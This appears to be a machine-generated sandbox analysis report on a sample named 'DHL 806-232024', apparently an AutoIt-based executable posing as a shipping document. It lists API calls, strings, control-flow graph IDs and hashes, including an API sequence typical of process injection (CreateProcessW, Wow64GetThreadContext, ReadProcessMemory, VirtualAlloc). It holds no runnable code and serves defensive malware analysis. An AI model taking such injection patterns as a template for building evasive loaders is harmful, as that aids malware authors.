                                                                                  • String ID:
                                                                                  • API String ID: 204039940-0
                                                                                  • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                  • Instruction ID: 0e83981727e349282319b9df5e8f31a969973358bac5d74b681bcb94323bcf36
                                                                                  • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                                                  • Instruction Fuzzy Hash: E1A11874E00209EBDB18CFA4D898BEEB7B5FF48705F209169E501BB280D7799A41CF64

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1073 8d39e7-8d3a57 CreateWindowExW * 2 ShowWindow * 2
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008D3A15
                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008D3A36
                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008D3A4A
                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 008D3A53
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  • API String ID: 1584632944-3779509399
                                                                                  • Opcode ID: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
                                                                                  • Instruction ID: aeccae158ba1cbf6db4f402208213c1f38d717e6daf6f521afa81d08784e6d21
                                                                                  • Opcode Fuzzy Hash: 6f1880598302b1f66b812f5d1ddf0d23d1fb61c2fc7832c7fed0353d93ad7154
                                                                                  • Instruction Fuzzy Hash: 02F03A706252907EEA30572B6C18E2B2E7DD7CAF61F00002AB910E21B0C2A51800EAB0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1074 e4f388-e4f4da call e4cfd8 call e4f278 CreateFileW 1081 e4f4e1-e4f4f1 1074->1081 1082 e4f4dc 1074->1082 1085 e4f4f3 1081->1085 1086 e4f4f8-e4f512 VirtualAlloc 1081->1086 1083 e4f591-e4f596 1082->1083 1085->1083 1087 e4f514 1086->1087 1088 e4f516-e4f52d ReadFile 1086->1088 1087->1083 1089 e4f531-e4f56b call e4f2b8 call e4e278 1088->1089 1090 e4f52f 1088->1090 1095 e4f587-e4f58f ExitProcess 1089->1095 1096 e4f56d-e4f582 call e4f308 1089->1096 1090->1083 1095->1083 1096->1095
                                                                                  APIs
                                                                                    • Part of subcall function 00E4F278: Sleep.KERNELBASE(000001F4), ref: 00E4F289
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E4F4D0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileSleep
                                                                                  • String ID: 8SZ66DIWHAOLM1MYGRL5MY8R8NKH
                                                                                  • API String ID: 2694422964-1455615674
                                                                                  • Opcode ID: b024d4125774b6a18ffc02b70744cec1601b90cd84d567f02c0db5d83a010cf1
                                                                                  • Instruction ID: 202e4d08c775569a8ab154a02dfb008cef7fa95e778953a298769ab7967e5900
                                                                                  • Opcode Fuzzy Hash: b024d4125774b6a18ffc02b70744cec1601b90cd84d567f02c0db5d83a010cf1
                                                                                  • Instruction Fuzzy Hash: B3618070D04288DAEF11DBB4D848BEEBBB9AF19704F044199E2487B2C1D7B90B49CB65

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1098 8d410d-8d4123 1099 8d4129-8d413e call 8d7b76 1098->1099 1100 8d4200-8d4204 1098->1100 1103 8d4144-8d4164 call 8d7d2c 1099->1103 1104 90d5dd-90d5ec LoadStringW 1099->1104 1106 90d5f7-90d60f call 8d7c8e call 8d7143 1103->1106 1109 8d416a-8d416e 1103->1109 1104->1106 1116 8d417e-8d41fb call 8f3020 call 8d463e call 8f2ffc Shell_NotifyIconW call 8d5a64 1106->1116 1120 90d615-90d633 call 8d7e0b call 8d7143 call 8d7e0b 1106->1120 1110 8d4205-8d420e call 8d81a7 1109->1110 1111 8d4174-8d4179 call 8d7c8e 1109->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                                  APIs
                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0090D5EC
                                                                                    • Part of subcall function 008D7D2C: _memmove.LIBCMT ref: 008D7D66
                                                                                  • _memset.LIBCMT ref: 008D418D
                                                                                  • _wcscpy.LIBCMT ref: 008D41E1
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008D41F1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                  • String ID: Line:
                                                                                  • API String ID: 3942752672-1585850449
                                                                                  • Opcode ID: 12a76adb4c4cdf67ffd51f16cbef5647ae685766c75a83cc67a98ce239b934f2
                                                                                  • Instruction ID: 75c497f6d32490c43be2084ba4cc09d18fd0b2959cd8ccdf764025c738ee6faf
                                                                                  • Opcode Fuzzy Hash: 12a76adb4c4cdf67ffd51f16cbef5647ae685766c75a83cc67a98ce239b934f2
                                                                                  • Instruction Fuzzy Hash: 2A316B71018318ABEB21EB68DC46FEA77E8FB44314F10461BB595D22A1EB74A648C793

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1133 8d69ca-8d69f1 call 8d4f3d 1136 90e45a-90e46a call 9397e5 1133->1136 1137 8d69f7-8d6a05 call 8d4f3d 1133->1137 1141 90e46f-90e471 1136->1141 1137->1136 1142 8d6a0b-8d6a11 1137->1142 1143 90e490-90e4d8 call 8f0ff6 1141->1143 1144 90e473-90e476 call 8d4faa 1141->1144 1146 8d6a17-8d6a39 call 8d6bec 1142->1146 1147 90e47b-90e48a call 934534 1142->1147 1153 90e4da-90e4e4 1143->1153 1154 90e4fd 1143->1154 1144->1147 1147->1143 1156 90e4f8-90e4f9 1153->1156 1157 90e4ff-90e512 1154->1157 1158 90e4e6-90e4f5 1156->1158 1159 90e4fb 1156->1159 1160 90e518 1157->1160 1161 90e689-90e68c call 8f2f95 1157->1161 1158->1156 1159->1157 1163 90e51f-90e522 call 8d75e0 1160->1163 1164 90e691-90e69a call 8d4faa 1161->1164 1166 90e527-90e549 call 8d5f12 call 93768b 1163->1166 1171 90e69c-90e6ac call 8d7776 call 8d5efb 1164->1171 1177 90e54b-90e558 1166->1177 1178 90e55d-90e567 call 937675 1166->1178 1184 90e6b1-90e6e1 call 92fcb1 call 8f106c call 8f2f95 call 8d4faa 1171->1184 1180 90e650-90e660 call 8d766f 1177->1180 1186 90e581-90e58b call 93765f 1178->1186 1187 90e569-90e57c 1178->1187 1180->1166 1189 90e666-90e670 call 8d74bd 1180->1189 1184->1171 1196 90e58d-90e59a 1186->1196 1197 90e59f-90e5a9 call 8d5f8a 1186->1197 1187->1180 1195 90e675-90e683 1189->1195 1195->1161 1195->1163 1196->1180 1197->1180 1202 90e5af-90e5c7 call 92fc4d 1197->1202 1208 90e5c9-90e5e8 call 8d7f41 call 8d5a64 1202->1208 1209 90e5ea-90e5ed 1202->1209 1233 90e60b-90e619 call 8d5f12 1208->1233 1211 90e61b-90e61e 1209->1211 1212 90e5ef-90e60a call 8d7f41 call 8d6999 call 8d5a64 1209->1212 1214 90e620-90e629 call 92fb6e 1211->1214 1215 90e63e-90e641 call 937621 1211->1215 1212->1233 1214->1184 1227 90e62f-90e639 call 8f106c 1214->1227 1222 90e646-90e64f call 8f106c 1215->1222 1222->1180 1227->1166 1233->1222
                                                                                  APIs
                                                                                    • Part of subcall function 008D4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F
                                                                                  • _free.LIBCMT ref: 0090E68C
                                                                                  • _free.LIBCMT ref: 0090E6D3
                                                                                    • Part of subcall function 008D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                  • API String ID: 2861923089-1757145024
                                                                                  • Opcode ID: 7a86a1cf5e1f093ff848ad3c7381ceea1ab333982bbf0ff7498337b5e0057a68
                                                                                  • Instruction ID: 3acb943514eb9184b3e96c80ff158d0853392e97681444aa363808422f0be775
                                                                                  • Opcode Fuzzy Hash: 7a86a1cf5e1f093ff848ad3c7381ceea1ab333982bbf0ff7498337b5e0057a68
                                                                                  • Instruction Fuzzy Hash: 46917A71910219AFCF14EFA8C8919EDB7B8FF19314F04496AF815EB2A1EB31A904CB51
                                                                                  APIs
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
                                                                                    • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401
                                                                                    • Part of subcall function 008E6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008DFA90), ref: 008E62B4
                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008DFB2D
                                                                                  • OleInitialize.OLE32(00000000), ref: 008DFBAA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009149F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1986988660-2740779761
                                                                                  • Opcode ID: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
                                                                                  • Instruction ID: b27805b3a3d05d580d854c017278e4c12ab752c5308c7056fda188e9e4bb8564
                                                                                  • Opcode Fuzzy Hash: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
                                                                                  • Instruction Fuzzy Hash: 9F81A8B09293408FC794EFBEE9516257BE8FB99748710862BE019C7372EB315444EF52
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008D35A1,SwapMouseButtons,00000004,?), ref: 008D35D4
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D35F5
                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D3617
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 3677997916-824357125
                                                                                  • Opcode ID: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
                                                                                  • Instruction ID: 804764dcfcb74642737a47b672f652d955bfdd014691c4c16d3d3a2adde21946
                                                                                  • Opcode Fuzzy Hash: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
                                                                                  • Instruction Fuzzy Hash: E2113675554208BADB218FA5EC40EAAB7A8EF15750F00466AA805E7210D2719E40A761
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00E4EA33
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E4EAC9
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E4EAEB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2065276175.0000000000E4C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E4C000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e4c000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                  • Instruction ID: f292dfcc19eb7915d23852788c29a95478a4363f18ca5ba6305aca86b28cf3c0
                                                                                  • Opcode Fuzzy Hash: 0b43d72d38ac188f5e361c01a6572487286e397564ea08694eb873f1bb21aafa
                                                                                  • Instruction Fuzzy Hash: D462F830A146589BEB24CFA4D850BDEB372FF58304F1091A9E10DEB390E7769E81CB59
                                                                                  APIs
                                                                                    • Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D
                                                                                    • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
                                                                                    • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1
                                                                                  • _free.LIBCMT ref: 0093992C
                                                                                  • _free.LIBCMT ref: 00939933
                                                                                  • _free.LIBCMT ref: 0093999E
                                                                                    • Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
                                                                                    • Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB
                                                                                  • _free.LIBCMT ref: 009399A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                  • String ID:
                                                                                  • API String ID: 1552873950-0
                                                                                  • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                  • Instruction ID: df36c3426dd6e265e1db0e304713de782e3d80129478edafbc75fe112a6d8896
                                                                                  • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                  • Instruction Fuzzy Hash: 92515EB1904618AFDF249F64DC81BAEBBB9FF48300F0004AEB209A7241DB715E80CF59
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2782032738-0
                                                                                  • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                  • Instruction ID: 9c492d4103b7505e0a8d78f89dd2c50de655089cc70b774ca06f2060912c0b3e
                                                                                  • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                  • Instruction Fuzzy Hash: E441C57070061E9BDF188E79C88097F7BA6FF80360B24913FEA55C7650EBB09D408B44
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0090EE62
                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0090EEAC
                                                                                    • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                                                    • Part of subcall function 008F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                  • String ID: X
                                                                                  • API String ID: 3777226403-3081909835
                                                                                  • Opcode ID: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
                                                                                  • Instruction ID: f20f1ca4db76897d5304730f72856f8ad31001cd7370065c40b3883f6c1f1a0e
                                                                                  • Opcode Fuzzy Hash: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
                                                                                  • Instruction Fuzzy Hash: 2B21A170A1425C9BCB15AF98C845BEE7BF9EF49314F04401AE508E7381EBB459898BA2
                                                                                  APIs
                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00939B82
                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00939B99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: Temp$FileNamePath
                                                                                  • String ID: aut
                                                                                  • API String ID: 3285503233-3010740371
                                                                                  • Opcode ID: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
                                                                                  • Instruction ID: 7d713f400a7cf7bb8ca1f1ef499c2b876f0a36edd6abc1fc81dbea6d361765be
                                                                                  • Opcode Fuzzy Hash: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
                                                                                  • Instruction Fuzzy Hash: BDD05EBA54430DABDB10ABA0DC0EF9A772CE704705F0042A1BE64961A1DEB055989B92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
                                                                                  • Instruction ID: c426fa78a8d5c027f73e95040b127c105d4ad57b15ecfb5a54c8114e930e8d79
                                                                                  • Opcode Fuzzy Hash: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
                                                                                  • Instruction Fuzzy Hash: 42F14875A083119FCB14DF28C480A6ABBE5FF88314F14892EF8A99B351D771E945CF82
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 008D4401
                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008D44C3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_$_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1505330794-0
                                                                                  • Opcode ID: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
                                                                                  • Instruction ID: 97a2ac2ca79ee2514dfde02fcc367ee9c3234bb04eca69b758c1776452713a8d
                                                                                  • Opcode Fuzzy Hash: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
                                                                                  • Instruction Fuzzy Hash: 36314F705097018FD720DF28D88469BBBF8FB48318F000A2FE59AC2351D775A984DB96
                                                                                  APIs
                                                                                  • __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                                                    • Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3D2
                                                                                    • Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3DC
                                                                                  • __NMSG_WRITE.LIBCMT ref: 008F596A
                                                                                    • Part of subcall function 008FA408: GetModuleFileNameW.KERNEL32(00000000,009943BA,00000104,?,00000001,00000000), ref: 008FA49A
                                                                                    • Part of subcall function 008FA408: ___crtMessageBoxW.LIBCMT ref: 008FA548
                                                                                    • Part of subcall function 008F32DF: ___crtCorExitProcess.LIBCMT ref: 008F32E5
                                                                                    • Part of subcall function 008F32DF: ExitProcess.KERNEL32 ref: 008F32EE
                                                                                    • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                                                                  • RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
